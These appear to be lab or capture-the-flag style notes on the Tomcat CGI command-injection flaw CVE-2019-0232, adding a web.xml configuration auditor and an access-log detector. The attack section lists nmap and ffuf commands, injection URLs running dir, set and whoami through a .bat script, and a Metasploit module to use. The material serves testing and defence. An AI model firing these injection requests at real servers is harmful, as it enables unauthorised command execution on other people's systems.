Tomcat CGI

CVE-2019-0232 is a critical security issue that could result in remote code execution. It affects Tomcat running on Windows with the CGI Servlet's enableCmdLineArguments feature enabled: an input validation error in the CGI Servlet allows command injection, letting an attacker execute arbitrary commands on the affected system. Versions 9.0.0.M1 to 9.0.17, 8.5.0 to 8.5.39, and 7.0.0 to 7.0.93 of Tomcat are affected.
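Because the whole issue hinges on one init-param of org.apache.catalina.servlets.CGIServlet, the quickest defensive check is to audit conf/web.xml (and any application web.xml) for a CGI Servlet definition and the value of enableCmdLineArguments. The script below is an added example, not part of the original notes: it builds a constructed web.xml that maps the servlet under /cgi/* (the path used on this page; Tomcat's shipped sample uses /cgi-bin/*) and rates each CGIServlet definition. The cmdLineArgumentsDecoded parameter is the argument allow-list regex that the fixed releases added; the sample pattern used here is my own choice, not Tomcat's default. An absent enableCmdLineArguments is reported as REVIEW rather than guessed, because its default changed across releases.

```python
"""Audit a Tomcat web.xml for CGIServlet definitions that expose command line
arguments (the setting behind CVE-2019-0232).  Added example; the web.xml it
parses is constructed here, not taken from any real deployment."""
import xml.etree.ElementTree as ET

CGI_SERVLET_CLASS = "org.apache.catalina.servlets.CGIServlet"


def build_web_xml(init_params):
    """Return a minimal constructed web.xml mapping the CGI Servlet to /cgi/*.
    init_params: dict of <init-param> name -> value."""
    init = "".join(
        "    <init-param>\n"
        f"      <param-name>{name}</param-name>\n"
        f"      <param-value>{value}</param-value>\n"
        "    </init-param>\n"
        for name, value in init_params.items()
    )
    return (
        '<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="4.0">\n'
        "  <servlet>\n"
        "    <servlet-name>cgi</servlet-name>\n"
        f"    <servlet-class>{CGI_SERVLET_CLASS}</servlet-class>\n"
        f"{init}"
        "  </servlet>\n"
        "  <servlet-mapping>\n"
        "    <servlet-name>cgi</servlet-name>\n"
        "    <url-pattern>/cgi/*</url-pattern>\n"
        "  </servlet-mapping>\n"
        "</web-app>\n"
    )


def _local(tag):
    """Strip the XML namespace so the audit works with any web-app schema version."""
    return tag.rsplit("}", 1)[-1]


def _child_text(elem, name):
    for child in elem:
        if _local(child.tag) == name:
            return (child.text or "").strip()
    return None


def audit_cgi_servlet(web_xml):
    """One finding per CGIServlet definition: URL patterns, the configured
    enableCmdLineArguments value, the argument allow-list and a risk rating."""
    root = ET.fromstring(web_xml)
    servlets, mappings = {}, {}
    for elem in root.iter():
        tag = _local(elem.tag)
        if tag == "servlet" and _child_text(elem, "servlet-class") == CGI_SERVLET_CLASS:
            params = {
                _child_text(p, "param-name"): _child_text(p, "param-value")
                for p in elem if _local(p.tag) == "init-param"
            }
            servlets[_child_text(elem, "servlet-name")] = params
        elif tag == "servlet-mapping":
            mappings.setdefault(_child_text(elem, "servlet-name"), []).append(
                _child_text(elem, "url-pattern")
            )

    findings = []
    for name, params in servlets.items():
        enabled = params.get("enableCmdLineArguments")
        allow_list = params.get("cmdLineArgumentsDecoded")
        if enabled is None:
            # Default differs between Tomcat releases: make it explicit instead of guessing.
            risk = "REVIEW"
        elif enabled.lower() == "true":
            # MEDIUM assumes a fixed release that honours the allow-list; the
            # affected versions listed above ignore cmdLineArgumentsDecoded entirely.
            risk = "MEDIUM" if allow_list else "HIGH"
        else:
            risk = "LOW"
        findings.append({
            "servlet": name,
            "url_patterns": mappings.get(name, []),
            "enableCmdLineArguments": enabled,
            "cmdLineArgumentsDecoded": allow_list,
            "risk": risk,
        })
    return findings


if __name__ == "__main__":
    # Constructed samples: the risky configuration beside the hardened one.
    risky = build_web_xml({"cgiPathPrefix": "WEB-INF/cgi", "enableCmdLineArguments": "true"})
    hardened = build_web_xml({"cgiPathPrefix": "WEB-INF/cgi", "enableCmdLineArguments": "false"})
    for label, xml in (("risky", risky), ("hardened", hardened)):
        for finding in audit_cgi_servlet(xml):
            print(label, finding)
```

Point the script at a real conf/web.xml by reading the file into a string and passing it to audit_cgi_servlet; a LOW rating for every finding, or no CGIServlet definition at all, is the state you want on Windows hosts.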

Enumeration

nmap -p- -sC -Pn 10.129.204.227 --open 

Finding a CGI script

  1. Browse to the default /cgi directory and fuzz for valid .cmd or .bat scripts

Browsing directly to the /cgi directory returns Not Found (404). You need to find a valid CGI script name in order to get a 200 HTTP code and be able to try executing commands.

ffuf -w /usr/share/dirb/wordlists/common.txt -u http://10.129.204.227:8080/cgi/FUZZ.bat

Attacking CGI script

If we find a valid CGI script, we can try to execute a command as shown in the following examples:

http://10.129.204.227:8080/cgi/welcome.bat?&dir
http://10.129.204.227:8080/cgi/welcome.bat?&set
http://10.129.204.227:8080/cgi/welcome.bat?&c:\windows\system32\whoami.exe
http://10.129.204.227:8080/cgi/welcome.bat?&c%3A%5Cwindows%5Csystem32%5Cwhoami.e
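The requests above leave a distinctive trail in the Tomcat access log: a query string on a /cgi/*.bat or *.cmd script that contains no "=" (so the CGI Servlet hands it to the script as command line arguments rather than as form data) and whose decoded value carries cmd.exe metacharacters or a drive path, usually preceded by a burst of 404s from the same source while a valid script name is being fuzzed. The detector below is an added example, not part of the original notes; the log lines it runs over are constructed in the Tomcat AccessLogValve "common" format, and the fuzzing threshold is an arbitrary choice.

```python
"""Flag CVE-2019-0232 style CGI argument injection and script fuzzing in Tomcat
access logs.  Added example; the log lines below are constructed, not real."""
import json
import re
from urllib.parse import unquote_plus, urlsplit

# AccessLogValve pattern "common": %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
# Scripts the Windows CGI Servlet would run through cmd.exe.
CGI_SCRIPT_RE = re.compile(r"^/cgi/[^/]+\.(bat|cmd)$", re.IGNORECASE)
SHELL_META = set("&|;^<>`")
DRIVE_PATH_RE = re.compile(r"[A-Za-z]:\\")

# Constructed sample: three misses while fuzzing, two injection attempts,
# then benign traffic from another client.
SAMPLE_LOG = [
    '10.10.14.5 - - [10/Oct/2023:12:00:01 +0000] "GET /cgi/admin.bat HTTP/1.1" 404 0',
    '10.10.14.5 - - [10/Oct/2023:12:00:01 +0000] "GET /cgi/test.bat HTTP/1.1" 404 0',
    '10.10.14.5 - - [10/Oct/2023:12:00:02 +0000] "GET /cgi/index.bat HTTP/1.1" 404 0',
    '10.10.14.5 - - [10/Oct/2023:12:00:03 +0000] "GET /cgi/welcome.bat?&dir HTTP/1.1" 200 512',
    '10.10.14.5 - - [10/Oct/2023:12:00:04 +0000] '
    '"GET /cgi/welcome.bat?&c%3A%5Cwindows%5Csystem32%5Cwhoami.exe HTTP/1.1" 200 40',
    '10.10.14.9 - - [10/Oct/2023:12:00:05 +0000] "GET /cgi/welcome.bat?name=alice HTTP/1.1" 200 120',
    '10.10.14.9 - - [10/Oct/2023:12:00:06 +0000] "GET /docs/index.html HTTP/1.1" 200 9000',
]


def parse_line(line):
    """Return the log fields as a dict, or None for a line in another format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def cgi_arguments(target):
    """Decoded command line arguments a request would pass to a /cgi script,
    or None when the query string is absent or is ordinary form data."""
    parts = urlsplit(target)
    if not CGI_SCRIPT_RE.match(parts.path):
        return None
    if not parts.query or "=" in parts.query:
        return None
    return unquote_plus(parts.query)


def is_injection_attempt(target):
    """True when the CGI arguments contain cmd.exe metacharacters or a drive path."""
    args = cgi_arguments(target)
    if args is None:
        return False
    return any(c in SHELL_META for c in args) or DRIVE_PATH_RE.search(args) is not None


def analyze(log_lines, fuzz_threshold=3):
    """Collect injection attempts and sources that 404 repeatedly under /cgi/."""
    attempts, not_found = [], {}
    for line in log_lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if is_injection_attempt(rec["target"]):
            attempts.append({
                "ip": rec["ip"], "time": rec["time"], "status": int(rec["status"]),
                "target": rec["target"], "args": cgi_arguments(rec["target"]),
            })
        if rec["status"] == "404" and rec["target"].lower().startswith("/cgi/"):
            not_found[rec["ip"]] = not_found.get(rec["ip"], 0) + 1
    fuzzers = sorted(ip for ip, n in not_found.items() if n >= fuzz_threshold)
    return {"injection_attempts": attempts, "fuzzing_sources": fuzzers}


if __name__ == "__main__":
    print(json.dumps(analyze(SAMPLE_LOG), indent=2))
```

A 200 on a flagged request is the line to escalate: it means the script exists and the arguments reached cmd.exe, so the host should be checked against the affected version list and the enableCmdLineArguments setting. Note that the check keys on the absence of "=" because that is what makes the CGI Servlet treat the query string as arguments; a request such as ?name=alice is never flagged.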

Metasploit module

exploit/windows/http/tomcat_cgi_cmdlineargs

You first need to identify the CGI directory and a valid CGI script. Once you are sure that the target is vulnerable, you can use this module with the option ForceExploit set to true.
